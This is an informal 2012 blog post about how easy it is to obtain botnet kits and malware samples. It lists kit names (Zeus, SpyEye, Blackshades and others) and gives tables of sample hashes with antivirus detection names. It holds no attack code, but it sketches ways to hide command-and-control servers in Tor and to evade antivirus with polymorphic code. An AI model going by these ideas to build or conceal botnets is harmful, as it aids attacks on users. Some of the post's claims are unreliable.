09/23/12

Free Bot-Nets Anyone

gAtO wAs - looking for code for bot’s to see how they work and I want to tell you it’s been kinda easy to find lots of bots…bots, code and DIY kits./ OK [1] below is the list of the Bots I found downloaded and playing with them to see how they work. Another part of this problem is it’s not just code and DIY kits, but code_mixer is a library that allows you to generate new Virus, undetectable to AV software. I also found different versions of Bots and different type of networks, IRC bots, http_bots, p2p_bots and on top of all this I found all kinds of discussions about how to make them ToR enable which has been going on for a while. Hiding a sophisticated c&c Bot-Master server in ToR ONION NETWORK IS EASY.

gAtOs –/ bot-net collection /–

I also wanted to know if these bot’s and code was not just old code stuff- well some is old by Internet years 2009 – that’s a long time in cyber pirate years but polymorphing code works no matter when it was created and it hides virus and worms really easy from AV systems especially if it’s a new version of the bots . Another thing I wanted to find is STUXNET, DUQU, FLAME SkyWriter and other famous Bots. Well I found samples of these — not just one but hundreds of version of these bot’s- and it was easy I included a list of some of the more newer bot codes.[2]…//

Oh I forgot ToR and Bots including  STUXNET, DUQU, FLAME SkyWriter and others do run in Tor onion network just check out the – insert date – First seen – Last seen – dates on this list . you may also check out —https://zeustracker.abuse.ch/statistic.php  — I found that my builder version showed that I had found Zeus 2.0.8.9 and is the number one version of zeus bot-net.  

One easy bot design is to use Tor2Web as a way to access a c&c server in Tor without running Tor on the infected client. The Tor network is getting more popular and people see that they can’t be caught in Tor so they are building lot’s of new Bots that run all over Tor – p2p and http and they are starting also new places like i2p networks and running bots—/   -gAtO oUt

[1] the list of Bots and code 

  1. _blackShades_4.8 Net -
  2. Black Pro _LostDoor v5.1
  3. BlackShade 4.8
  4. Blackshades NET v4.2
  5. Blackshades NET v3.8.1
  6. Blackshades_Archive
  7. Botnet Packet
  8. dark_Comet_1342319517
  9. ebookskayla-1
  10. G-Bot_1.7
  11. INCREDULiTY – ClientMesh
  12. ISR Stealer 0.4
  13. KnollKeylogger-1
  14. LostDoor Black Pro v5.1
  15. open source Exploit Pack
  16. optima10_ddos
  17. ProRat_v1.9 SE
  18. Spy-Net v2.7 Final
  19. SpyEye 1.3.45 Loader
  20. spyeye_tutorial
  21. Stuxnet_Laurelai-decompile-dump-2e11313
  22. Ultimate_Spy-Net v2.7 Final
  23. x_1ST-SECTION FILE INFECTOR, library+example,
  24. x_007
  25. x_arclib
  26. x_avp_troj
  27. x_code_mixer
  28. x_dscript
  29. x_eicar
  30. x_http ASM
  31. x_infecting *.HLP files (example/description)
  32. x_m1
  33. x_mistfall
  34. x_Mistfall.ZOMBIE-z10d
  35. x_pgpmorf1
  36. x_pgpmorf2
  37. x_tp_com
  38. x_zhello
  39. ZeuS 2.0.8-1.9
  40. Zeus collection
  41. ZBOT
  42. zeus 1.2.7.19
  43. ZeuS 2.0.8.9 – experimental
  44. Zeus Analysis Website

—[2] STUXNET, DUQU, FLAME SkyWriter and a few more bots in the wild check out the last seen date…

 

 

 

 

 

 

Flamer Bots  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
d73fe5f9f8dc2fc68aea57ba5c0353f4 2012-07-16 2012-06-07 09:11:15 2012-06-19 20:28:53 Win32/Flamer.A Win32:Skywiper- N [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Trojan:Win32/Fl ame.A!cert
06a84ad28bbc9365eb9e08c697555154 2012-06-26 2012-06-05 11:24:36 2012-06-08 12:08:30 Win32/Flamer.A Win32:Skywiper- K [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!D Armadillo v1.71
0a17040c18a6646d485bde9ce899789f 2012-06-20 2012-05-30 12:45:05 2012-06-29 21:10:27 a variant of Win32/Flamer.A Win32:Skywiper- H [Trj] HEUR:Worm.Win32 .Flame.gen Trojan.Flame.A Worm:Win32/Flam e.gen!A
581f2ef2e3ba164281b562e435882eb5 2012-06-20 2012-06-01 06:09:15 2012-06-08 21:49:22 Win32/Flamer.A Win32:Skywiper- E [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!A
5a002eb0491ff2b5f275a73f43edf19e 2012-06-20 2012-06-01 08:13:39 2012-06-29 21:15:07 Win32/Flamer.A Win32:Skywiper- E [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!A
7551635b101b63b215512b00d60e00f3 2012-06-20 2006-07-18 04:31:57 2012-06-20 04:19:30 probably a variant of Win32/Agent.IGOUUZX Win32:Trojan-ge n Backdoor.Win32. Bifrose.cgfb Trojan.DialUpPa sswordMailer.A Trojan:Win32/Du twiper Aspack ASPack v1.08.03
75de82289ac8c816e27f3215a4613698 2012-06-20 2012-06-01 06:17:01 2012-06-21 06:36:16 Win32/Flamer.A Win32:Skywiper- L [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!A
8ed3846d189c51c6a0d69bdc4e66c1a5 2012-06-20 2010-10-05 03:56:52 2012-06-21 06:21:20 Win32/Flamer.A Win32:Malware-g en Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!A
bddbc6974eb8279613b833804eda12f9 2012-06-20 2012-06-01 03:37:00 2012-06-21 06:23:32 Win32/Flamer.A Win32:Skywiper- K [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!D Armadillo v1.71
c09306141c326ce96d39532c9388d764 2012-06-20 2012-06-01 08:09:24 2012-06-21 06:43:33 Win32/Flamer.A Win32:Skywiper- L [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!A
cc54006c114d51ec47c173baea51213d 2012-06-20 2012-06-01 08:13:46 2012-06-01 10:05:08 Win32/Flamer.A Win32:Skywiper- E [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!C
e5a49547191e16b0a69f633e16b96560 2012-06-20 2012-05-30 14:22:32 2012-06-28 00:41:49 a variant of Win32/Flamer.A Win32:Skywiper- H [Trj] HEUR:Worm.Win32 .Flame.gen Trojan.Flame.A Worm:Win32/Flam e.gen!A
f0a654f7c485ae195ccf81a72fe083a2 2012-06-20 2012-05-28 14:37:54 2012-06-24 11:31:16 Win32/Flamer.A Win32:Skywiper- A [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!B
cb5 2012-06-19 2010-07-20 13:41:34 2012-06-24 11:30:50 Win32/Flamer.A Win32:Skywiper- I [Trj] Worm.Win32.Flam e.a Trojan.Flame.A Worm:Win32/Flam e.gen!A
0464e1fabcf2ef8b24d6fb63b19f1064 2012-06-18 2012-06-11 08:06:23 2012-06-11 08:06:23 Win32:Skywiper- A [Trj]
09d6740fd9be06cbb5182d02a851807d 2012-06-18 2012-06-11 08:14:24 2012-06-11 08:14:24 Win32:Skywiper- C [Trj]
780c5bc598054a365a75d10ac05a3157 2012-06-18 2012-06-11 07:50:56 2012-06-11 07:50:56 Win32:Skywiper- D [Trj]
cb98cca16865aa2330d2cf93fd6886ff 2012-06-18 2012-06-11 07:41:19 2012-06-11 07:41:19 Win32:Skywiper- E [Trj]
fac96cf0f5a43980635f6a6017a5edb0 2012-06-18 2012-08-04 06:42:23 2012-08-04 06:42:23 Win32:Skywiper- F [Trj]
bb4bf0681a582245bd379e4ace30274b 2012-06-16 2012-05-28 14:37:53 2012-07-25 19:03:03 Win32:Skywiper- D [Trj] Trojan.Generic. KDV.641104
Checked on VT at 2012-07-25 02:22:38

—DUQU Bot  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
2f5a23b67e6928d58df136fb3431c1a2 2012-08-27 2012-06-27 09:06:34 2012-06-27 09:06:34 Win32/Packed.ASProtect.CEC Win32:Duqu-L [Rtk] Trojan.Win32.Ge nome.fxan Backdoor.PCClie nt.1 Armadillo v1.xx – v2.xx
362b306967fa08fa204e968613c48b54 2012-08-27 2012-06-25 19:17:57 2012-06-25 19:17:57 a variant of Win32/PcClient.NDO Win32:Duqu-L [Rtk] Trojan.Win32.Ge nome.cfwz Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient Themida Xtreme-Protecto r v1.05
5a8b8b55e7d12bcaee50af462d70e4f1 2012-08-27 2012-03-23 03:56:59 2012-03-24 06:50:48 a variant of Win32/TrojanDropper.Delf.NXY Win32:Duqu-I [Rtk] Trojan-Dropper. Win32.Agent.wzj Trojan.Generic. 2087186 Backdoor:Win32/ Delf.RAN
71c91c34ef08b0222a7385a9fc91a156 2012-08-27 2010-01-07 16:30:15 2012-08-01 21:30:31 Win32:Duqu-L [Rtk] Trojan.Win32.Ge nome.ptdr Backdoor.PCClie nt.1 NSPack NsPacK V3.7 -> LiuXingPing
78efa3d89fa835c2d841ca021ba04f9a 2012-08-27 2012-06-20 16:29:55 2012-06-20 16:29:55 Win32/PcClient Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.akqr Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient NSPack
7e995e30b3c752d55708ba70b64c576d 2012-08-27 2012-07-01 03:18:29 2012-07-01 03:18:29 a variant of Win32/PcClient.NEK Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.eld Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient Malware_Prot.AJ
8fb8994eb25f35d1e4f62ab00871170b 2012-08-27 2011-11-30 06:35:32 2011-11-30 06:35:32 Win32/PcClient.NCD Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.eld Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient Malware_Prot.AJ
90fc2ddf9985d14d4252b016018852af 2012-08-27 2012-06-27 06:46:46 2012-06-27 06:46:46 a variant of Win32/PcClient Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.dire Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient
9a9e77d2b7792fbbddcd7ce05a4eb26e 2012-08-27 2011-11-02 03:07:36 2011-11-02 03:16:28 Win32/Duqu.A Win32:Malware-g en Trojan.Win32.In ject.bjyg Trojan.Generic. 6658401 Trojan:Win32/Hi deproc.G UPX_LZMA
9d00bebb4be61eb425ef8adfa05968fd 2012-08-27 2012-05-23 12:23:42 2012-05-27 21:59:18 a variant of Win32/PcClient.NBG Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.hnp Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient ASPack v2.12
9dc323e0595caf5e5152b6353c6c7b58 2012-08-27 2012-07-01 09:01:29 2012-07-01 09:01:29 a variant of Win32/PcClient.NEK Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.eld Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient Malware_Prot.AJ
b25cc61de1a0d2086356d7757b26e2ef 2012-08-27 2012-06-23 15:43:36 2012-06-23 15:43:36 Win32/PcClient.NBI Win32:Duqu-L [Rtk] Backdoor.Win32. Hupigon.bxjm Backdoor.PCClie nt.1 Backdoor:Win32/ Hupigon.ZQ.dll Aspack ASPack v2.12
bb9c97fe54b85179f9a83ca4cfdd24f3 2012-08-27 2012-07-02 11:06:55 2012-07-02 11:06:55 a variant of Win32/PcClient.NEK Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.eld Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient Malware_Prot.AJ
ca7b6963a5b45b67e1bfa1a0f415eb24 2012-08-27 2012-06-29 01:20:37 2012-06-29 01:20:37 Win32/PcClient.NCD Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.eld Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient Malware_Prot.AJ
5d8932237d14019ae81e97c5b8951ef8 2012-08-15 2012-08-18 11:59:04 2012-08-18 11:59:04 Win32:Duqu-L [Rtk] HEUR:Trojan.Win 32.Generic Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient NSPack
6416039108bd666f073d51db5328f6c9 2012-08-15 2012-08-18 14:07:59 2012-08-18 14:07:59 Win32:Duqu-L [Rtk] HEUR:Backdoor.W in32.Generic Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient ASPack v2.12
774c19f455cff3a443e7f3a58983a12b 2012-08-15 2012-08-18 18:18:21 2012-08-18 18:18:21 Win32:Duqu-I [Rtk] Backdoor.Win32. Hupigon2.ja Trojan.Generic. 826880 Backdoor:Win32/ Delf.RAN
b19fe4b53d01d2746eb83e9fddd1eb67 2012-08-15 2012-07-16 12:33:52 2012-07-16 12:33:52 Win32:Duqu-L [Rtk] HEUR:Backdoor.W in32.Generic Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient ASPack v2.12
f41b0a33d2ca4ba05a95b1a9a40e7e28 2012-08-15 2012-08-19 15:09:26 2012-08-19 15:09:26 Win32:Duqu-L [Rtk] Backdoor.Win32. PcClient.agyu Backdoor.PCClie nt.1 Backdoor:Win32/ PcClient
2f4e30a497ae6183aabfe8ba23068c1b 2012-06-20 2012-06-11 17:02:50 2012-07-15 11:59:26 Win32/Stuxnet.A Win32:Malware-g en Worm.Win32.Stux net.v Win32.Worm.Stux net.E embedded  

 

 

 

 

the

 

—zeus  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
0a295bb2cbb44d9ba2e18bbfeb511d1d 2012-08-27 2011-02-24 10:59:09 2012-05-12 09:37:44 WinCE/Zbot.A Win32:Malware-g en Trojan-Spy.WinC E.Zitmo.a Backdoor.Bot.13 4855 Trojan:WinCE/Zi tmo.A
2b2dcecfd882efb2100ce28d09c89f75 2012-08-27 2009-01-30 05:49:27 2009-07-02 06:23:46 a variant of Win32/Spy.Zbot.JF Win32:Zbot-BCW Trojan.Spy.Zeus .C PWS:Win32/Zbot
33a6fef6d2487a95af539e532be424b2 2012-08-27 2011-09-03 03:28:17 2012-02-21 21:41:11 a variant of Win32/Zeus.B Win32:Malware-g en Backdoor.Win32. BotNet.ac Gen:Variant.Kaz y.8986 PWS:Win32/Zbot. TV UPX UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
4153a07347b3bdf74b527e51cc63a843 2012-08-27 2010-05-16 15:01:27 2010-05-18 21:58:47 a variant of Win32/Spy.Agent.PZ Win32:Zbot-gen Trojan-Spy.Win3 2.Zbot.myj Trojan.Spy.Zeus .1.Gen PWS:Win32/Zbot. gen!A
4fe9b3febda0dd9e8f89ed29b1a39560 2012-08-27 2012-03-27 07:25:01 2012-03-28 09:48:26 a variant of Win32/Spy.Agent.PZ Win32:Susn-G [Trj] Trojan-Spy.Win3 2.Zbot.roh Trojan.Spy.Zeus .1.Gen PWS:Win32/Zbot. GA
7b470095ce2887377e6f9e37fd0471dc 2012-08-27 2012-06-30 09:12:53 2012-06-30 09:12:53 a variant of Win32/Spy.Agent.PZ Win32:Zbot-gen [Trj] Trojan-Spy.Win3 2.Zbot.roh Trojan.Spy.Zeus .1.Gen PWS:Win32/Zbot. GA
831d2fdb9ad258f68ce5924b1feac10a 2012-08-27 2011-10-17 02:49:20 2012-04-30 22:09:54 a variant of Win32/Spy.Agent.PZ Win32:Susn-G [Trj] Trojan-Spy.Win3 2.Zbot.roh Trojan.Spy.Zeus .1.Gen PWS:Win32/Zbot. GA
9eb88298f93809ea7d733e29bb3d466b 2012-08-27 2007-11-16 20:51:16 2011-08-09 00:18:04 a variant of Win32/Spy.Agent.PZ Win32:Tibs-BND [Trj] Trojan-Spy.Win3 2.Zbot.adj Trojan.Spy.Zeus .2.Gen PWS:Win32/Zbot. gen!B
9faf0c526795ee01839ecb51074dd7ae 2012-08-27 2012-06-23 06:47:46 2012-06-23 06:47:46 a variant of Win32/Spy.Agent.PZ Win32:Tibs-BNF [Trj] Trojan-Spy.Win3 2.Zbot.adj Trojan.Spy.Zeus .2.Gen PWS:Win32/Zbot. gen!B
a05211df243da8a9e628b4767aafc989 2012-08-27 2007-11-17 13:55:10 2011-08-08 23:43:09 Win32/Spy.Agent.NDY Win32:Zbot-AG [Trj] Trojan-Spy.Win3 2.Zbot.po Trojan.Spy.Zeus .2.Gen PWS:Win32/Zbot. gen!B
aa874f7c37962240569ff35a030c2e71 2012-08-27 2012-06-26 08:59:57 2012-06-26 08:59:57 a variant of Win32/Kryptik.OV Win32:Zbot-FS [Trj] Trojan-Spy.Win3 2.Zbot.xw Trojan.Spy.Zeus .1.Gen PWS:Win32/Zbot. gen!B
b484264bca4286f65d5cb68efefa9dc4 2012-08-27 2008-08-22 19:29:43 2009-01-08 08:22:34 Trojan.Spy.Zeus .1.Gen TrojanSpy:Win32 /Zbot.gen!C
c38412218981ddc0cd93d5d98971a781 2012-08-27 2009-12-19 06:17:33 2009-12-31 15:13:34 a variant of Win32/Spy.Zbot.UN Win32:Zbot-BCW Trojan-Spy.Win3 2.Zbot.aadb Trojan.Spy.Zeus .C PWS:Win32/Zbot. gen!R
c4905c4610b9c2992bc395429b7365ab 2012-08-27 2009-09-04 15:24:05 2009-09-04 15:24:05 Win32:Zbot-BCW Heur.Trojan.Gen eric Trojan.Spy.Zeus .C PWS:Win32/Zbot. gen!R
c70db2b312a23e11b5e671cac70db98f 2012-08-27 2008-02-19 12:29:14 2012-02-19 14:34:25 PS/MPC-Zeus-753 Virus.DOS.PS-MP C-based PS-MPC.0753.DN. Gen Virus:DOS/PSMPC .753
d16a1870603a0f7111c64584e6eb5deb 2012-08-27 2012-02-20 19:36:30 2012-03-02 01:50:10 Win32/PSW.Agent.NTM Win32:Zeus-A [Trj] Trojan.Win32.Ag ent2.fadw Gen:Variant.Zlo b.1 PWS:Win32/Farei t.gen!C
d1db75d0b93b0f1bda856242c8ab1264 2012-08-27 2009-10-15 20:31:08 2009-10-17 14:14:20 a variant of Win32/Spy.Zbot.UN Win32:Zbot-BCW Heur.Trojan.Gen eric Trojan.Spy.Zeus .C PWS:Win32/Zbot. QA
d5a75c535b33fc09f1ab6e181d59fc84 2012-08-27 2011-06-18 10:59:14 2011-12-09 01:49:01 a variant of Win32/Spy.Zbot.XO Win32:Zbot-ATL [Trj] Trojan-Spy.Win3 2.Zbot.roh Trojan.Spy.Zeus .1.Gen PWS:Win32/Zbot. C
e806cfe7d3257bf61f5b95215e3ec23e 2012-08-27 2012-06-23 03:56:28 2012-06-23 03:56:28 a variant of Win32/Spy.Agent.PZ Trojan-Spy.Win3 2.Zbot.adj Trojan.Spy.Zeus .2.Gen PWS:Win32/Zbot. gen!B
078b7684cbc5cd14770fb2c842ece7e4 2012-08-15 2012-08-04 03:55:52 2012-08-09 17:09:00 Win32:Susn-G [Trj] Trojan-Spy.Win3 2.Zbot.roh

—gBot  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
0017c17069fcd00a8c13e2e1bb955494 2012-08-27 2011-11-16 12:17:45 2011-12-14 17:33:12 a variant of Win32/Kryptik.VNB Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.rtt Trojan.Generic. 6903230 Backdoor:Win32/ Cycbot.G
0033496f9baa6c05dc709db64a7b8cef 2012-08-27 2011-11-19 12:30:08 2011-12-16 01:08:42 a variant of Win32/Kryptik.VZB Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.rwf Trojan.Generic. 6914846 Backdoor:Win32/ Cycbot.G
00392a6a7919d425e512c4466984f8f3 2012-08-27 2011-10-05 04:29:14 2011-11-29 18:00:26 a variant of Win32/Kryptik.TEV Win32:Cybota [Trj] Backdoor.Win32. Gbot.osk Gen:Variant.Kaz y.38517 Backdoor:Win32/ Cycbot.G
004ed94e35b42f7b76fb4b729573a123 2012-08-27 2012-01-13 03:41:13 2012-02-11 12:53:50 a variant of Win32/Kryptik.YBH Win32:Cybota [Trj] Backdoor.Win32. Gbot.qwk Gen:Variant.Kaz y.50582 Backdoor:Win32/ Cycbot.G
00b66b966778139c0b83721c5e307695 2012-08-27 2011-11-24 01:24:42 2012-01-02 23:04:36 Win32/Cycbot.AF Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.qwn Gen:Heur.Kelios .1 Backdoor:Win32/ Cycbot.G
00c789e5ae793c6be65482d4b472f0f0 2012-08-27 2011-11-18 16:42:21 2011-12-15 14:43:24 Win32/Cycbot.AK Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.rvk Backdoor.Bot.14 6893 Backdoor:Win32/ Cycbot.G
00daf7e9577d84c5949439b02f11af74 2012-08-27 2011-03-23 02:31:51 2011-07-20 22:11:40 Win32/Cycbot.AF Win32:Cybota [Trj] Backdoor.Win32. Gbot.aed Gen:Trojan.Heur .KS.1 Backdoor:Win32/ Cycbot.B
00ddbd4723ec6394f278fd5d3275a952 2012-08-27 2012-02-02 18:46:53 2012-03-29 17:13:40 Win32/Cycbot.AK Win32:Cybota [Trj] Backdoor.Win32. Gbot.qwt Gen:Variant.Kaz y.53272 Backdoor:Win32/ Cycbot.G
00deb18fb207bc020a30ff7b7550f279 2012-08-27 2011-03-19 21:01:29 2011-07-12 08:53:49 a variant of Win32/Kryptik.LOJ Win32:Cybota [Trj] Backdoor.Win32. Gbot.adk Gen:Trojan.Heur .KS.1 Backdoor:Win32/ Cycbot.B
00e762e7fe180b096207c7b72f608cc3 2012-08-27 2012-06-20 11:30:59 2012-06-20 11:30:59 a variant of Win32/AGbot.V Win32:SdBot-FJH [Trj] Backdoor.Win32. SdBot.ozd Gen:Win32.IRC-B ackdoor.fmW@aih z9oj Backdoor:Win32/ Gaertob.A Armadillo v1.71
00f3359898621f36a5251759a3a89495 2012-08-27 2011-11-11 20:35:02 2011-11-16 04:05:08 Win32/Adware.WinAntiVirus.AD Win32:Gbot-M [Trj] Trojan-Download er.Win32.Fdvm.b Application.Gen eric.386031 Trojan:Win32/Si refef.P
00f83d49831dc202e04478f670b96d50 2012-08-27 2011-12-14 07:28:20 2011-12-14 07:28:20 Win32/Cycbot.AF Win32:Cybota [Trj] Backdoor.Win32. Gbot.qmi Backdoor.Gbot.I Backdoor:Win32/ Cycbot.G
00fc1e69ca9031e5c47dfcde78dc0537 2012-08-27 2011-09-09 05:34:05 2012-02-11 20:04:14 a variant of Win32/Kryptik.RWA Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.iag Gen:Variant.Kaz y.34336 Backdoor:Win32/ Cycbot.G
0117b98cb2114c51c4d51831820cc8e4 2012-08-27 2011-04-02 06:56:59 2011-07-21 00:22:16 Win32/Cycbot.AF Win32:Cybota [Trj] Backdoor.Win32. Gbot.ahq Trojan.Generic. KD.163287 Backdoor:Win32/ Cycbot.B
016d69d4cbd779b63bb6927fa9c19730 2012-08-27 2012-03-10 20:03:49 2012-04-30 20:29:18 a variant of Win32/Kryptik.SUP Win32:Cybota [Trj] Backdoor.Win32. Gbot.oep Gen:Heur.Conjar .5 Backdoor:Win32/ Cycbot.G
0189fd7b339df01d4a4be1113520ad46 2012-08-27 2010-02-19 22:20:06 2012-06-09 04:12:35 a variant of MSIL/TrojanDropper.Agent.JF Win32:Malware-g en Trojan-Dropper. MSIL.Agent.fws Trojan.Generic. 3812196 VirTool:Win32/O bfuscator.NC
01e118c11c4145710ff1801f34a44bc7 2012-08-27 2012-07-05 15:25:49 2012-07-05 15:25:49 a variant of Win32/Kryptik.ACYA Win32:MalOb-IF [Cryp] Backdoor.Win32. Gbot.wkt Gen:Variant.Bar ys.3481 TrojanDownloade r:Win32/Carberp .C
021817e91793fa15bee2937fe2befddd 2012-08-27 2011-12-06 03:55:36 2012-01-03 16:39:38 a variant of Win32/Kryptik.VCE Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.qxq Gen:Variant.Kaz y.42337 Backdoor:Win32/ Cycbot.G
0229d3256bd2309f1d581533febdc1e7 2012-08-27 2012-01-31 17:40:43 2012-02-21 13:59:28 a variant of Win32/Kryptik.UVF Win32:KadrBot [Trj] Trojan.Win32.Jo rik.ZAccess.no Gen:Variant.Kaz y.41897 Trojan:Win32/Si refef.J
0296357c2952eafb29b2edeaf776a787 2012-08-27 2011-09-13 21:55:14 2012-02-12 16:34:09 a variant of Win32/Kryptik.RLK Win32:Cybota [Trj] Trojan.Win32.Jo rik.Gbot.epv Gen:Variant.Kaz y.33354 Backdoor:Win32/ Cycbot.G

 

—spyeye  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

action md5 insert date First seen Last seen nod32 avast kaspersky bitdefender microsoft f_prot_unpacker peid
004df992aa00f6a83388aeb55cf806bb 2012-08-27 2012-03-17 18:33:21 2012-04-25 11:55:35 a variant of Win32/Kryptik.VMB Win32:MalOb-IV [Cryp] HEUR:Trojan.Win 32.Generic Gen:Variant.Kaz y.43891 Trojan:Win32/Dy namer!dtc
0050771f197d912b1fd2767c9b07b0d9 2012-08-27 2012-01-22 05:30:06 2012-01-22 05:30:06 Win32:MalOb-IJ [Cryp] HEUR:Trojan.Win 32.Generic Gen:Variant.Kaz y.46466
0055add5c7c8778b1e97e0bc2cdb34fd 2012-08-27 2011-04-05 09:52:34 2012-08-17 14:32:46 Win32:Karagany- E [Trj] Trojan-Spy.Win3 2.SpyEyes.gaf Gen:Variant.Kaz y.154 TrojanDownloade r:Win32/Karagan y.A
00881bfd664c40bd17f00da4e2b1707e 2012-08-27 2012-01-30 20:45:05 2012-03-25 16:25:27 Win32/Ramnit.A Win32:Vitro HEUR:Trojan.Win 32.Generic Gen:Heur.FKP.1 Trojan:Win32/Ra mnit.A
009f01b994bd6211d8b79775decc5854 2012-08-27 2012-06-25 07:23:14 2012-06-25 07:23:14 Win32/Spy.SpyEye.CA Win32:Regrun-JI [Trj] Trojan.Win32.Me nti.kxpm Trojan.Generic. 6382824 Trojan:Win32/Ey eStye.N Armadillo v1.71
00bbce9dac6dec8f16547da20c09594c 2012-08-27 2011-11-11 04:55:40 2011-11-11 04:55:40 a variant of Win32/AutoRun.Injector.AM Win32:Spyeye-ZL [Trj] HEUR:Trojan.Win 32.Generic Worm.Generic.35 0922 Armadillo v1.71
00db3ed3ba79dcc6627b13f5c0557f46 2012-08-27 2012-06-25 13:26:56 2012-06-25 13:26:56 a variant of Win32/Kryptik.HJW Win32:Zbot-MVW [Trj] Trojan-Download er.Win32.Piker. cqy Gen:Variant.Kaz y.1690 TrojanDownloade r:Win32/Bredola b.AC
00ffd9a941c6fe8d57210bf82c674943 2012-08-27 2011-06-26 15:23:06 2011-07-19 07:46:49 Win32/Bamital.FA Win32:Trojan-ge n Trojan.Win32.Of icla.nbt Trojan.Generic. KD.225389 Trojan:Win32/Me redrop UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
012cca77918ab828662e9b726c97319c 2012-08-27 2011-11-03 13:55:46 2012-01-28 16:05:29 a variant of Win32/Injector.KLZ Win32:Spyeye-YV [Trj] Trojan.Win32.In ject.bpoa Gen:Variant.Gra ftor.3243 VirTool:Win32/D elfInject.gen!C M
01341c165ed887fa134250750b2218c4 2012-08-27 2011-12-15 08:45:54 2012-01-19 04:40:25 Win32/AutoRun.Spy.Banker.M Win32:Spyware-g en [Spy] Trojan-Dropper. Win32.Dapato.sd d Trojan.Generic. KDV.479801 Worm:Win32/Crid ex.B Armadillo v1.71
014e076ae37f2e5e612ae748dd9e4177 2012-08-27 2011-11-11 03:24:24 2011-11-24 20:34:32 a variant of Win32/Injector.JMN Win32:Crypt-KLY [Trj] Trojan.Win32.Bu zus.iofc Trojan.Generic. 6686401 TrojanDropper:W in32/Sirefef.B
01525755f4b3c800560bdc4ac3c80cbd 2012-08-27 2011-03-09 19:58:13 2011-03-19 04:41:56 a variant of Win32/Injector.FBK Win32:Spyware-g en Trojan-Spy.Win3 2.SpyEyes.fqu Trojan.Generic. KDV.152375
019f9a5668d3de770f4c0a741a4f0c4a 2012-08-27 2012-03-28 01:18:38 2012-03-28 05:03:51 a variant of Win32/Injector.KCP Win32:Regrun-JI [Trj] HEUR:Trojan.Win 32.Generic Gen:Variant.Gra ftor.1584 Armadillo v1.71
01b36ef0ca621293f6c74c7b2950946a 2012-08-27 2012-01-06 23:55:08 2012-06-07 08:19:28 Win32/AutoRun.IRCBot.HO Win32:Malware-g en Trojan-Dropper. Win32.Injector. boyd Backdoor.Agent. ABAV Worm:Win32/Phor piex.B
01ceff3646dd40eaa11ed4cf7a75d495 2012-08-27 2012-03-21 00:04:37 2012-03-22 04:53:17 a variant of Win32/Kryptik.ACTR Win32:Spyeye-AC T [Trj] Trojan-FakeAV.W in32.Agent.dks Gen:Variant.Bre do.21 Rogue:Win32/Win websec
01d1d9f8c314a19e9f5cc7dc06693ea5 2012-08-27 2012-06-20 01:29:52 2012-06-20 01:29:52 Win32:Spyeye-WC [Trj] Trojan.Win32.Ge nome.acnzw Gen:Variant.Kaz y.37631 VirTool:Win32/O bfuscator.TT
01ef0b349a8b2c598f24fad77bb7d506 2012-08-27 2012-06-27 04:01:59 2012-06-27 04:01:59 a variant of Win32/Kryptik.HCV Win32:Malware-g en Trojan-Spy.Win3 2.SpyEyes.evw Trojan.Generic. KD.45757 Rogue:Win32/Win websec
